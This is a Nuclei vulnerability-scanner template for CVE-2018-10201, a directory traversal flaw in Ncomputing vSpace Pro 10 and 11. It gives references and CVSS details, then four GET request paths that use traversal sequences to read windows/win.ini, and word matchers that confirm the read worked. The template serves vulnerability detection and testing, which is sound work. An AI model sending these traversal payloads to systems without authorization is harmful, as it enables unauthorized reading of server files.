nuclei-templates/cves/2018/CVE-2018-10201.yaml

39 lines
1.3 KiB
YAML

id: CVE-2018-10201
info:
name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal
author: 0x_akoko
severity: high
description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html
- https://www.cvedetails.com/cve/CVE-2018-10201
- http://www.kwell.net/kwell_blog/?p=5199
- https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-10201
cwe-id: CWE-22
tags: cve,cve2018,ncomputing,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'
- '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini'
- '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'
- '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# Enhanced by mp on 2022/04/26